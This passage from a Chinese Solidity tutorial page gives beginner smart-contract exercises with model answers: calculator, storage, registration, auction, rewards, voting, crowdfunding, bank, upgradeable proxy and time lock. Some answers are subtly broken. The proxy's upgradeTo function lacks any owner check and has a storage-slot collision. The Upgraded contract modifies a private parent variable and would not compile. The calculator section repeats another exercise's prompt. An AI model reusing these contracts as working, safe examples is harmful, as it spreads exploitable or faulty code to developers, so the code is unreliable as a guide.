class="hljs-params">(uint)</span></span>{<br> <span class="hljs-keyword">return</span> i - j;<br> }<br>}<br></code></pre></td></tr></table></figure><p>你看连识别都用不了</p><h2 id="简单计算器合约"><a href="#简单计算器合约" class="headerlink" title="简单计算器合约"></a>简单计算器合约</h2><p>题目: 创建一个合约,用于存储一个整数。用户可以通过 set(uint256 x) 函数来设置这个整数,通过 get() 函数来查询当前存储的值。</p><p>提示:<br>• set(uint256 x):设置存储的整数值。<br>• get():返回当前存储的整数值<br>题目: 实现一个简单的计算器合约,支持加法、减法、乘法和除法操作。分别实现 add(uint256 a, uint256 b)、subtract(uint256 a, uint256 b)、multiply(uint256 a, uint256 b) 和 divide(uint256 a, uint256 b) 函数。<br>提示:<br>add(uint256 a, uint256 b):返回 a 和 b 的和。<br>subtract(uint256 a, uint256 b):返回 a 和 b 的差。<br>multiply(uint256 a, uint256 b):返回 a 和 b 的积。<br>divide(uint256 a, uint256 b):返回 a 除以 b 的商,需检查 b 是否为零。</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract SimpleCalculator {<br> <span class="hljs-comment">// 加法函数</span><br> <span class="hljs-function">function <span class="hljs-title">add</span><span class="hljs-params">(uint256 a, uint256 b)</span> <span class="hljs-keyword">public</span> pure <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br> <span class="hljs-keyword">return</span> a + b;<br> }<br><br> <span class="hljs-comment">// 减法函数</span><br> <span class="hljs-function">function <span class="hljs-title">subtract</span><span class="hljs-params">(uint256 a, uint256 b)</span> <span class="hljs-keyword">public</span> pure <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br> <span class="hljs-built_in">require</span>(a >= b, <span class="hljs-string">"Subtraction would result in a negative value"</span>);<br> <span class="hljs-keyword">return</span> a - b;<br> }<br><br> <span class="hljs-comment">// 乘法函数</span><br> <span class="hljs-function">function <span class="hljs-title">multiply</span><span class="hljs-params">(uint256 a, uint256 b)</span> <span class="hljs-keyword">public</span> pure <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br> <span class="hljs-keyword">return</span> a * b;<br> }<br><br> <span class="hljs-comment">// 除法函数</span><br> <span class="hljs-function">function <span class="hljs-title">divide</span><span class="hljs-params">(uint256 a, uint256 b)</span> <span class="hljs-keyword">public</span> pure <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br> <span class="hljs-built_in">require</span>(b != <span class="hljs-number">0</span>, <span class="hljs-string">"Cannot divide by zero"</span>);<br> <span class="hljs-keyword">return</span> a / b;<br> }<br>}<br></code></pre></td></tr></table></figure><h2 id="存储合约"><a href="#存储合约" class="headerlink" title="存储合约"></a>存储合约</h2><p>题目: 创建一个合约,用于存储一个整数。用户可以通过 set(uint256 x) 函数来设置这个整数,通过 get() 函数来查询当前存储的值。</p><p>提示:<br>• set(uint256 x):设置存储的整数值。<br>• get():返回当前存储的整数值。</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract SimpleStorage {<br> uint256 <span class="hljs-keyword">private</span> storedValue;<br><br> <span class="hljs-comment">// 设置存储的整数值</span><br> <span class="hljs-function">function <span class="hljs-title">set</span><span class="hljs-params">(uint256 x)</span> <span class="hljs-keyword">public</span> </span>{<br> storedValue = x;<br> }<br><br> <span class="hljs-comment">// 返回当前存储的整数值</span><br> <span class="hljs-function">function <span class="hljs-title">get</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br> <span class="hljs-keyword">return</span> storedValue;<br> }<br>}<br></code></pre></td></tr></table></figure><h2 id="简单身份验证合约"><a href="#简单身份验证合约" class="headerlink" title="简单身份验证合约"></a>简单身份验证合约</h2><p>题目: 实现一个身份验证合约,允许用户注册和查询注册状态。用户可以通过 register() 函数注册,通过 isRegistered(address user) 函数查询某个地址是否已注册。</p><p>提示:<br>• register():用户调用此函数进行注册。<br>• isRegistered(address user):返回指定地址的注册状态。</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract Authentication {<br> <span class="hljs-built_in">mapping</span>(address => <span class="hljs-type">bool</span>) <span class="hljs-keyword">private</span> registeredUsers;<br><br> <span class="hljs-comment">// 注册函数:调用该函数的用户地址将被标记为已注册</span><br> <span class="hljs-function">function <span class="hljs-title">register</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> </span>{<br> <span class="hljs-built_in">require</span>(!registeredUsers[msg.sender], <span class="hljs-string">"User is already registered"</span>);<br> registeredUsers[msg.sender] = <span class="hljs-literal">true</span>;<br> }<br><br> <span class="hljs-comment">// 查询注册状态函数:返回指定地址的注册状态</span><br> <span class="hljs-function">function <span class="hljs-title">isRegistered</span><span class="hljs-params">(address user)</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(<span class="hljs-type">bool</span>)</span> </span>{<br> <span class="hljs-keyword">return</span> registeredUsers[user];<br> }<br>}<br></code></pre></td></tr></table></figure><h2 id="简单拍卖合约"><a href="#简单拍卖合约" class="headerlink" title="简单拍卖合约"></a>简单拍卖合约</h2><p>题目: 创建一个简单的拍卖合约,允许用户出价。实现 bid() 函数来提交出价,使用 getHighestBid() 函数查询当前最高出价。<br>提示:<br>• bid():提交出价,需确保出价高于当前最高出价。<br>• getHighestBid():返回当前最高出价。</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract SimpleAuction {<br> address <span class="hljs-keyword">public</span> highestBidder;<br> uint256 <span class="hljs-keyword">public</span> highestBid;<br><br> <span class="hljs-comment">// 提交出价函数,要求新出价高于当前最高出价</span><br> <span class="hljs-function">function <span class="hljs-title">bid</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> payable </span>{<br> <span class="hljs-built_in">require</span>(msg.value > highestBid, <span class="hljs-string">"Bid must be higher than the current highest bid"</span>);<br><br> <span class="hljs-comment">// 如果有之前的最高出价,将其退还给之前的最高出价者</span><br> <span class="hljs-keyword">if</span> (highestBidder != <span class="hljs-built_in">address</span>(<span class="hljs-number">0</span>)) {<br> <span class="hljs-built_in">payable</span>(highestBidder).<span class="hljs-built_in">transfer</span>(highestBid);<br> }<br><br> <span class="hljs-comment">// 更新最高出价者和最高出价</span><br> highestBidder = msg.sender;<br> highestBid = msg.value;<br> }<br><br> <span class="hljs-comment">// 查询当前最高出价</span><br> <span class="hljs-function">function <span class="hljs-title">getHighestBid</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br> <span class="hljs-keyword">return</span> highestBid;<br> }<br>}<br></code></pre></td></tr></table></figure><h2 id="简单奖励合约"><a href="#简单奖励合约" class="headerlink" title="简单奖励合约"></a>简单奖励合约</h2><p>题目: 创建一个合约,允许用户存款并根据存款金额给予奖励。实现 deposit() 函数进行存款和 getReward() 函数查询奖励。</p><p>提示:<br>• deposit():存入以太,系统给予 10% 的奖励。<br>• getReward():查询当前用户的奖励。</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract DepositRewards {<br> <span class="hljs-built_in">mapping</span>(address => uint256) <span class="hljs-keyword">private</span> deposits;<br> <span class="hljs-built_in">mapping</span>(address => uint256) <span class="hljs-keyword">private</span> rewards;<br><br> <span class="hljs-comment">// 存款函数,用户存入以太并获得 10% 的奖励</span><br> <span class="hljs-function">function <span class="hljs-title">deposit</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> payable </span>{<br> <span class="hljs-built_in">require</span>(msg.value > <span class="hljs-number">0</span>, <span class="hljs-string">"Deposit amount must be greater than zero"</span>);<br><br> <span class="hljs-comment">// 记录用户的存款金额</span><br> deposits[msg.sender] += msg.value;<br><br> <span class="hljs-comment">// 计算奖励并更新奖励映射</span><br> uint256 reward = (msg.value * <span class="hljs-number">10</span>) / <span class="hljs-number">100</span>;<br> rewards[msg.sender] += reward;<br> }<br><br> <span class="hljs-comment">// 查询当前用户的奖励</span><br> <span class="hljs-function">function <span class="hljs-title">getReward</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br> <span class="hljs-keyword">return</span> rewards[msg.sender];<br> }<br>}<br></code></pre></td></tr></table></figure><h2 id="投票合约"><a href="#投票合约" class="headerlink" title="投票合约"></a>投票合约</h2><p>题目: 创建一个投票合约,允许用户注册候选人并为其投票。实现 addCandidate(string memory name) 和 vote(uint candidateId) 函数。</p><p>提示:<br>• addCandidate(string memory name):添加新的候选人。<br>• vote(uint candidateId):为指定候选人投票。</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract Voting {<br> <span class="hljs-keyword">struct</span> <span class="hljs-title class_">Candidate</span> {<br> string name;<br> uint256 voteCount;<br> }<br><br> Candidate[] <span class="hljs-keyword">public</span> candidates;<br> <span class="hljs-built_in">mapping</span>(address => <span class="hljs-type">bool</span>) <span class="hljs-keyword">private</span> hasVoted;<br><br> <span class="hljs-comment">// 添加候选人函数</span><br> <span class="hljs-function">function <span class="hljs-title">addCandidate</span><span class="hljs-params">(string memory name)</span> <span class="hljs-keyword">public</span> </span>{<br> candidates.<span class="hljs-built_in">push</span>(<span class="hljs-built_in">Candidate</span>(name, <span class="hljs-number">0</span>));<br> }<br><br> <span class="hljs-comment">// 投票函数,为指定候选人投票</span><br> <span class="hljs-function">function <span class="hljs-title">vote</span><span class="hljs-params">(uint256 candidateId)</span> <span class="hljs-keyword">public</span> </span>{<br> <span class="hljs-built_in">require</span>(candidateId < candidates.length, <span class="hljs-string">"Invalid candidate ID"</span>);<br> <span class="hljs-built_in">require</span>(!hasVoted[msg.sender], <span class="hljs-string">"You have already voted"</span>);<br><br> <span class="hljs-comment">// 增加候选人的票数</span><br> candidates[candidateId].voteCount += <span class="hljs-number">1</span>;<br><br> <span class="hljs-comment">// 标记该用户已投票</span><br> hasVoted[msg.sender] = <span class="hljs-literal">true</span>;<br> }<br><br> <span class="hljs-comment">// 获取候选人总数</span><br> <span class="hljs-function">function <span class="hljs-title">getCandidateCount</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br> <span class="hljs-keyword">return</span> candidates.length;<br> }<br><br> <span class="hljs-comment">// 获取候选人信息</span><br> <span class="hljs-function">function <span class="hljs-title">getCandidate</span><span class="hljs-params">(uint256 candidateId)</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(string memory, uint256)</span> </span>{<br> <span class="hljs-built_in">require</span>(candidateId < candidates.length, <span class="hljs-string">"Invalid candidate ID"</span>);<br> <span class="hljs-keyword">return</span> (candidates[candidateId].name, candidates[candidateId].voteCount);<br> }<br>}<br></code></pre></td></tr></table></figure><h2 id="众筹合约"><a href="#众筹合约" class="headerlink" title="众筹合约"></a>众筹合约</h2><p>题目: 创建一个众筹合约,允许用户出资并达到目标后提取资金。实现 contribute() 和 withdraw() 函数。</p><p>提示:<br>• contribute():允许用户捐款并记录贡献金额。<br>• withdraw():允许众筹目标达成后提取资金。</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract Crowdfunding {<br> address <span class="hljs-keyword">public</span> owner;<br> uint256 <span class="hljs-keyword">public</span> goal;<br> uint256 <span class="hljs-keyword">public</span> totalContributions;<br> <span class="hljs-type">bool</span> <span class="hljs-keyword">public</span> goalReached;<br> <br> <span class="hljs-built_in">mapping</span>(address => uint256) <span class="hljs-keyword">public</span> contributions;<br><br> <span class="hljs-built_in">constructor</span>(uint256 _goal) {<br> owner = msg.sender;<br> goal = _goal;<br> goalReached = <span class="hljs-literal">false</span>;<br> }<br><br> <span class="hljs-comment">// 出资函数,记录用户的贡献金额</span><br> <span class="hljs-function">function <span class="hljs-title">contribute</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> payable </span>{<br> <span class="hljs-built_in">require</span>(msg.value > <span class="hljs-number">0</span>, <span class="hljs-string">"Contribution must be greater than zero"</span>);<br> <span class="hljs-built_in">require</span>(!goalReached, <span class="hljs-string">"Goal already reached"</span>);<br><br> contributions[msg.sender] += msg.value;<br> totalContributions += msg.value;<br><br> <span class="hljs-comment">// 如果总贡献金额达到或超过目标,标记为达成</span><br> <span class="hljs-keyword">if</span> (totalContributions >= goal) {<br> goalReached = <span class="hljs-literal">true</span>;<br> }<br> }<br><br> <span class="hljs-comment">// 提取资金函数,众筹达成目标后允许合约所有者提取资金</span><br> <span class="hljs-function">function <span class="hljs-title">withdraw</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> </span>{<br> <span class="hljs-built_in">require</span>(msg.sender == owner, <span class="hljs-string">"Only the owner can withdraw funds"</span>);<br> <span class="hljs-built_in">require</span>(goalReached, <span class="hljs-string">"Funding goal not reached"</span>);<br><br> <span class="hljs-built_in">payable</span>(owner).<span class="hljs-built_in">transfer</span>(<span class="hljs-built_in">address</span>(<span class="hljs-keyword">this</span>).balance);<br> }<br><br> <span class="hljs-comment">// 查询用户的贡献金额</span><br> <span class="hljs-function">function <span class="hljs-title">getContribution</span><span class="hljs-params">(address contributor)</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br> <span class="hljs-keyword">return</span> contributions[contributor];<br> }<br>}<br></code></pre></td></tr></table></figure><h2 id="资产管理合约"><a href="#资产管理合约" class="headerlink" title="资产管理合约"></a>资产管理合约</h2><p>题目: 开发一个合约,允许用户存款、取款并查询余额。实现 deposit()、withdraw(uint amount) 和 getBalance() 函数。</p><p>提示:<br>• deposit():存入以太。<br>• withdraw(uint amount):提取指定金额。<br>• getBalance():查询当前余额</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract SimpleBank {<br> <span class="hljs-built_in">mapping</span>(address => uint256) <span class="hljs-keyword">private</span> balances;<br><br> <span class="hljs-comment">// 存款函数,将用户发送的以太存入他们的账户</span><br> <span class="hljs-function">function <span class="hljs-title">deposit</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> payable </span>{<br> <span class="hljs-built_in">require</span>(msg.value > <span class="hljs-number">0</span>, <span class="hljs-string">"Deposit amount must be greater than zero"</span>);<br> balances[msg.sender] += msg.value;<br> }<br><br> <span class="hljs-comment">// 取款函数,用户可以提取指定金额的以太</span><br> <span class="hljs-function">function <span class="hljs-title">withdraw</span><span class="hljs-params">(uint256 amount)</span> <span class="hljs-keyword">public</span> </span>{<br> <span class="hljs-built_in">require</span>(amount > <span class="hljs-number">0</span>, <span class="hljs-string">"Withdrawal amount must be greater than zero"</span>);<br> <span class="hljs-built_in">require</span>(balances[msg.sender] >= amount, <span class="hljs-string">"Insufficient balance"</span>);<br><br> <span class="hljs-comment">// 更新余额并转账</span><br> balances[msg.sender] -= amount;<br> <span class="hljs-built_in">payable</span>(msg.sender).<span class="hljs-built_in">transfer</span>(amount);<br> }<br><br> <span class="hljs-comment">// 查询当前余额</span><br> <span class="hljs-function">function <span class="hljs-title">getBalance</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br> <span class="hljs-keyword">return</span> balances[msg.sender];<br> }<br>}<br></code></pre></td></tr></table></figure><h2 id="合约升级示例"><a href="#合约升级示例" class="headerlink" title="合约升级示例"></a>合约升级示例</h2><p>题目: 创建一个可升级的合约。初始合约实现 setValue(uint value) 和 getValue(),升级合约添加 incrementValue()。</p><p>提示:<br>• setValue(uint value):设置一个值。<br>• getValue():获取当前值。<br>• incrementValue():将当前值加一(在升级合约中实现)。</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br><span class="hljs-comment">// 可升级合约的代理合约</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract Proxy {<br> address <span class="hljs-keyword">public</span> implementation;<br><br> <span class="hljs-built_in">constructor</span>(address _implementation) {<br> implementation = _implementation;<br> }<br><br> <span class="hljs-function">function <span class="hljs-title">upgradeTo</span><span class="hljs-params">(address _implementation)</span> <span class="hljs-keyword">public</span> </span>{<br> implementation = _implementation;<br> }<br><br> <span class="hljs-built_in">fallback</span>() external {<br> address impl = implementation;<br> <span class="hljs-built_in">require</span>(impl != <span class="hljs-built_in">address</span>(<span class="hljs-number">0</span>), <span class="hljs-string">"Implementation not set"</span>);<br> <span class="hljs-comment">// 调用实现合约的方法</span><br> assembly {<br> <span class="hljs-built_in">calldatacopy</span>(<span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-built_in">calldatasize</span>())<br> let result := <span class="hljs-built_in">delegatecall</span>(<span class="hljs-built_in">gas</span>(), impl, <span class="hljs-number">0</span>, <span class="hljs-built_in">calldatasize</span>(), <span class="hljs-number">0</span>, <span class="hljs-number">0</span>)<br> let size := <span class="hljs-built_in">returndatasize</span>()<br> <span class="hljs-built_in">returndatacopy</span>(<span class="hljs-number">0</span>, <span class="hljs-number">0</span>, size)<br> <span class="hljs-keyword">switch</span> result<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0</span> { <span class="hljs-built_in">revert</span>(<span class="hljs-number">0</span>, size) }<br> <span class="hljs-keyword">default</span> { <span class="hljs-built_in">return</span>(<span class="hljs-number">0</span>, size) }<br> }<br> }<br>}<br><br><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br><span class="hljs-comment">// 初始合约</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract Initial {<br> uint256 <span class="hljs-keyword">private</span> value;<br><br> <span class="hljs-function">function <span class="hljs-title">setValue</span><span class="hljs-params">(uint256 _value)</span> <span class="hljs-keyword">public</span> </span>{<br> value = _value;<br> }<br><br> <span class="hljs-function">function <span class="hljs-title">getValue</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(uint256)</span> </span>{<br> <span class="hljs-keyword">return</span> value;<br> }<br>}<br><br><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br><span class="hljs-comment">// 升级合约</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br><span class="hljs-keyword">import</span> <span class="hljs-string">"./Initial.sol"</span>;<br><br>contract Upgraded is Initial {<br> <span class="hljs-function">function <span class="hljs-title">incrementValue</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> </span>{<br> value += <span class="hljs-number">1</span>;<br> }<br>}<br></code></pre></td></tr></table></figure><h2 id="时间锁合约"><a href="#时间锁合约" class="headerlink" title="时间锁合约"></a>时间锁合约</h2><p>题目: 实现一个时间锁合约,允许用户存入资金并设置锁定时间。实现 deposit(uint unlockTime) 和 withdraw() 函数。</p><p>提示:<br>• deposit(uint unlockTime):存入以太并设置解锁时间。<br>• withdraw():在解锁后提取资金</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract TimeLock {<br> <span class="hljs-keyword">struct</span> <span class="hljs-title class_">Deposit</span> {<br> uint256 amount;<br> uint256 unlockTime;<br> }<br><br> <span class="hljs-built_in">mapping</span>(address => Deposit) <span class="hljs-keyword">private</span> deposits;<br><br> <span class="hljs-comment">// 存入资金并设置解锁时间</span><br> <span class="hljs-function">function <span class="hljs-title">deposit</span><span class="hljs-params">(uint256 unlockTime)</span> <span class="hljs-keyword">public</span> payable </span>{<br> <span class="hljs-built_in">require</span>(msg.value > <span class="hljs-number">0</span>, <span class="hljs-string">"Deposit amount must be greater than zero"</span>);<br> <span class="hljs-built_in">require</span>(unlockTime > block.timestamp, <span class="hljs-string">"Unlock time must be in the future"</span>);<br><br> <span class="hljs-comment">// 更新用户存款信息</span><br> deposits[msg.sender].amount += msg.value;<br> deposits[msg.sender].unlockTime = unlockTime;<br> }<br><br> <span class="hljs-comment">// 提取资金,只有在解锁后才允许</span><br> <span class="hljs-function">function <span class="hljs-title">withdraw</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> </span>{<br> Deposit storage userDeposit = deposits[msg.sender];<br> <span class="hljs-built_in">require</span>(block.timestamp >= userDeposit.unlockTime, <span class="hljs-string">"Funds are still locked"</span>);<br> <span class="hljs-built_in">require</span>(userDeposit.amount > <span class="hljs-number">0</span>, <span class="hljs-string">"No funds to withdraw"</span>);<br><br> uint256 amountToWithdraw = userDeposit.amount;<br> userDeposit.amount = <span class="hljs-number">0</span>; <span class="hljs-comment">// 清空存款,避免重入攻击</span><br><br> <span class="hljs-built_in">payable</span>(msg.sender).<span class="hljs-built_in">transfer</span>(amountToWithdraw);<br> }<br><br> <span class="hljs-comment">// 查询当前用户的存款信息</span><br> <span class="hljs-function">function <span class="hljs-title">getDepositInfo</span><span class="hljs-params">()</span> <span class="hljs-keyword">public</span> view <span class="hljs-title">returns</span> <span class="hljs-params">(uint256 amount, uint256 unlockTime)</span> </span>{<br> Deposit storage userDeposit = deposits[msg.sender];<br> <span class="hljs-keyword">return</span> (userDeposit.amount, 